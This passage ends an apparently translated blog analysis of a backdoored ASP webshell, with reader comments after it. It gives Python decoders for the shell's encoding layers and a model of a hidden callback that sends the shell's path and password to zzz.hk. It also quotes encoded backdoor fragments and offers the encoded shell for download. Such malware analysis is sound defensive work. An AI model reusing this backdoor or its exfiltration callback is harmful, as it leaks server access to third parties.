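    removed at run time by replace(w,"^",""); undo that as well."""
    m = re.search(r'w="([^"]*)"', decoded_xmlsend)
    return m.group(1).replace("^", "") if m else None


# Encoded fragments quoted in the write-up.
AAAA_SAMPLE = 'noitcnuF dnEΩ tluser = retniotxehΩ txeNΩ j + tluser = tluserΩ txeNΩ 61 * j = jΩ i - )nirts(neL oT 1 = k roFΩ fI dnEΩ ))1 ,i ,nirts(diM(tnIC = jΩ nehT Θ0Θ => )1 ,i ,nirts(diM dnA Θ9Θ =< )1 ,i ,nirts(diM fIΩ fI dnEΩ 01 = jΩ nehT ΘAΘ = )1 ,i ,nirts(diM rO ΘaΘ'
GANG_SAMPLE = '汗汗汗汗汗noitcnuF dnE汗gnihtoN=ptth teS汗dnes.ptth汗eslaf,lrutsoP,""TSOP"" nepo.ptth汗))"""",""^"",w(ecalper(tcejbOetaerC =ptth tes汗txen emuser rorre no汗)"""",flrcbv,)lrutsoP(mirt(ecalper=lrutsoP汗""1.5.tseuqerptthn^iw^.ptthni^w^""=w汗w mid汗)lrutsoP(dneSlmX noitcnuF汗汗汗汗汗汗'
ESCAPE_SAMPLE = 'RRS%22%3Cscript%20language%3Djavascript%3Efunction%20killErrors%28%29%7Breturn%20true%3B%7Dwindow.onerror%3DkillErrors%3B%22%0D%0ARRS%22function%20yesok%28%29%7Bif%20%28confirm%28%22%22%u4F60%u786E%u8BA4%u8981%u6267%u884C%u6B64%u64CD%u4F5C%u5417%uFF1F%22%22%29%29return%20true%3Belse%20return%20false%3B%7D%22'
ASCII_SAMPLE = ' 13. 10. 117. 61. 114. 101. 113. 117. 101. 115. 116. 46. 115. 101. 114. 118. 101. 114. 118. 97. 114. 105. 97. 98. 108. 101. 115. 40. 34. 104. 116. 116. 112. 95. 104. 111. 115. 116. 34. 41. 38. 117. 114. 108. 58. 82. 48. 48. 116. 80. 97. 116. 104. 61. 34. 104. 116. 116. 112. 58. 47. 47. 122. 122. 122. 46. 104. 107. 47. 108. 47. 63. 117. 61. 34. 38. 117. 38. 34. 38. 112. 61. 34. 38. 117. 115. 101. 114. 112. 97. 115. 115. 38. 34. 34. 13. 10.'

if __name__ == "__main__":
    print(decode_ascii_dots(ASCII_SAMPLE))                      # the R00tPath assignment
    print(recover_progid(decode_unlin(vb_literal(GANG_SAMPLE))))  # winhttp.winhttprequest.5.1
```

Three of the five layers (AAAA, Unlin, MorfiCoder) are the same idea, a string reversal with a private separator for line breaks and quotes, so a decoder for one is a decoder for all of them once the separator characters are known; the unescape and ASCII-dot layers are just standard encodings with a tiny amount of wrapping to defeat signature scanners.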

You cannot capture this backdoor from your test client, because the callback is made on the server through the WinHTTP component, and the SERVER_NAME checks blank the target when the shell is reached through a local or private-network hostname. To observe it on a test box, reach the shell through a hostname that none of the checks match (a hosts-file entry pointing a made-up domain at the test server will do; because of the 172.0.0.1 slip, plain 127.0.0.1 passes as well) and capture outbound traffic on the server itself.
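As an added example (my own code, not the shell's), the following Python models the callback exactly as the listings above define it: the SERVER_NAME suppression, the once-per-session guard that the upload, edit and Alexa handlers have and radmin() lacks, and the R00tPath URL itself. It then pulls the leaked shell path and password back out of an outbound proxy log line, which is where a defender would actually see this traffic. The hostnames, script path and log lines are constructed.

```python
"""Model of the Evil sadness callback: when it fires, what it sends, and how to
recover the leaked shell path and password from an outbound proxy log.
Added example, not the shell's code. Hostnames, paths and log lines are constructed."""
from urllib.parse import parse_qs, urlsplit

# The five substrings the shell tests against SERVER_NAME, exactly as written
# (including its own slip: 172.0.0.1 instead of 127.0.0.1).
LOCAL_MARKERS = ("localhost", "192.168.", "172.0.0.1", "10.", "local")
COLLECTOR = "http://zzz.hk/l/?u="


def beacon_suppressed(server_name):
    """True when the shell would blank R00tPath. 'local' already covers
    'localhost', and a plain 127.0.0.1 request is NOT suppressed."""
    return any(marker in server_name for marker in LOCAL_MARKERS)


def beacon_url(http_host, script_url, userpass):
    """R00tPath as built by the ASCII-encoded line: u = HTTP_HOST & URL.
    Nothing is URL-encoded, so a password containing '&' would corrupt the query."""
    return COLLECTOR + http_host + script_url + "&p=" + userpass


class ShellSession:
    """One ASP session. The upload, edit and Alexa handlers send the callback
    once per session (Session("IDebugMode")); the radmin() handler has no guard."""

    def __init__(self, server_name, http_host, script_url, userpass):
        self.server_name = server_name
        self.target = beacon_url(http_host, script_url, userpass)
        self.session = {}

    def act(self, handler):
        """Return the URL XmlSend would POST for this handler, or None.
        An empty R00tPath makes http.open fail silently under On Error Resume Next."""
        if beacon_suppressed(self.server_name):
            return None
        if handler != "radmin":
            if self.session.get("IDebugMode") == "ok":
                return None
            self.session["IDebugMode"] = "ok"
        return self.target


def parse_beacon(log_line):
    """Pull (shell path, password) out of a proxy log line that records the
    callback URL, or None for any other line."""
    for token in log_line.split():
        if token.startswith(COLLECTOR):
            qs = parse_qs(urlsplit(token).query)
            return qs["u"][0], qs["p"][0]
    return None


def find_leaks(lines):
    """Every (path, password) pair the collector could have learned from these lines."""
    return [hit for hit in map(parse_beacon, lines) if hit]


# Constructed Squid-style access log lines; only the second one is the callback.
PROXY_LOG = [
    "1260000000.101    45 10.0.0.5 TCP_MISS/200 512 GET http://example.org/ - DIRECT/203.0.113.1 text/html",
    "1260000000.977   120 10.0.0.5 TCP_MISS/200 0 POST http://zzz.hk/l/?u=www.victim.example/upload/x.asp&p=111 - DIRECT/203.0.113.9 -",
]

if __name__ == "__main__":
    s = ShellSession("www.victim.example", "www.victim.example", "/upload/x.asp", "111")
    print(s.act("upfile"))     # callback URL on the first upload
    print(s.act("EditFile"))   # None: already sent this session
    print(find_leaks(PROXY_LOG))
```

The practical upshot for incident response is that the collector learns both the shell's location and its password, so an egress log hit on zzz.hk/l/ is enough to know which file to pull and to assume a third party has had the same access as the shell's operator.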

To sum up: this shell uses five different custom encoding functions on top of the Script Encoder layer, six kinds of encoding in all. Formidable!



By request, I am only releasing the original encoded shell; have fun with it.

Download: (link to the encoded shell file)











The following notice is part of this article:
If you repost, keep it complete and credit: from 金刀客 [www.daokers.com]


[This entry was edited by 金刀客 on 2009-12-21 11:53 AM]
Comments (11):
mayimove [2011-01-06 10:11 PM]:
Read it... learned something!
Don't fully understand it though! Bumping anyway.

haaker [2010-04-23 04:19 PM]:
Haha... I saw this shell last year already. Nice feature set, and online they swore it had absolutely no backdoor; I very nearly used it. Glad I didn't!
There's a new one out this year; I've posted it to the forum, go take a look. This year's encoding is weak and easy to break!

刀客's decoder tool is nice!!

admin replied on 2010-04-23 04:44 PM:
Seen it; I said a few words about it on the forum.

小军 [2009-12-21 11:06 AM]:
When will WEBSHELL Decoder & Encoder be released?

金刀客 replied on 2009-12-21 11:31 AM:
Sorry, no release planned for now.

过儿 [2009-12-14 12:46 AM]:
Could you share your WEBSHELL Decoder & Encoder?

admin replied on 2009-12-14 11:29 PM:
Can't release it yet, sorry. Maybe later.

(anonymous) [2009-12-11 07:19 PM]:
So a single shell has a whole hidden world inside it, with this many secrets. Like young Runtu not knowing the strange journey a watermelon makes before it is put on sale at the shop. Much obliged, 刀客.

admin replied on 2009-12-11 10:11 PM:
∩_∩

Silence。 [2009-12-06 09:24 PM]:
Heh, just passing through and leaving a mark.

金刀客 replied on 2009-12-21 11:32 AM:
:-)

发现 [2009-10-23 10:19 PM]:
www.siliaonet.cn/cert/cpiejj.asp

This is the decoded code you published; I checked it, and it actually contains a new backdoor.

Presumably someone took it after you published the decoded version!

admin replied on 2009-10-24 03:16 PM:
Huh? Where did I publish decoded source for this shell? Didn't I say I only released the encoded file?

发现 [2009-10-23 10:06 PM]:
Recently I've noticed that after you publish decoded source, people keep taking the decoded code, planting backdoors in it and re-releasing it... sigh!!

admin replied on 2009-10-24 04:07 PM:
Thanks for the suggestion.

路过了 [2009-10-23 03:42 PM]:
Took down his backdoor database yesterday; only a thousand-odd entries, heh... I had suspected this one for a long time.

admin replied on 2009-10-23 07:14 PM:
Kid, passing through without leaving your real handle? Not very friendly.

博雅 [2009-10-21 08:01 PM]:
Pretty fierce indeed.

admin replied on 2009-10-23 07:15 PM:
Heh, 小雅.